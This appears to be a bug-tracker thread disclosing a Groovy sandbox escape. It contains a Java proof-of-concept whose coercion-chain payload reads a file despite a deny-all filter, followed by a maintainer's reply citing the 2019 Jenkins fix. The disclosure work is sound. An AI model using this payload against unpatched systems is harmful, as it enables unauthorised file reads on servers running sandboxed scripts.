Arbitrary file read

[XmiliaH]

The following script can read files, even with a DenyAll filter

import java.io.FileOutputStream;
import java.io.IOException;

import org.codehaus.groovy.control.CompilerConfiguration;
import org.kohsuke.groovy.sandbox.GroovyValueFilter;
import org.kohsuke.groovy.sandbox.SandboxTransformer;

import groovy.lang.GroovyShell;

public class Main {

    public static void main(String[] args) throws IOException {
        try(FileOutputStream fos=new FileOutputStream("secret.txt")){
            fos.write("Super Secret".getBytes());
        }

        GroovyShell gs = new GroovyShell(new CompilerConfiguration().addCompilationCustomizers(new SandboxTransformer()));
        GroovyValueFilter fa = new GroovyValueFilter() {
            @Override
            public Object filter(Object o) {
                throw new RuntimeException("Denied");
            }
        };
        fa.register();
        try {
            System.out.println(gs.evaluate("var i=0;{->if(i){return['secret.txt']as Object[]}else{i=1;return;}}as Collection as File as Object[]as Collection"));
        }finally {
            fa.unregister();
        }
    }

}

Expected output: RuntimeException: Denied Output: [Super Secret]

Using groovy-3.0-alpha-4 & Java 1.8

[daniel-beck]

@XmiliaH Thanks for the report! Fixed in https://jenkins.io/security/advisory/2019-07-31/#SECURITY-1465%20(1)

As you may have noticed, this issue tracker is not well monitored. In the future, please report issues as described on https://jenkins.io/security/#reporting-vulnerabilities

Would you like to be credited with this discovery in the security advisory, and if so, how?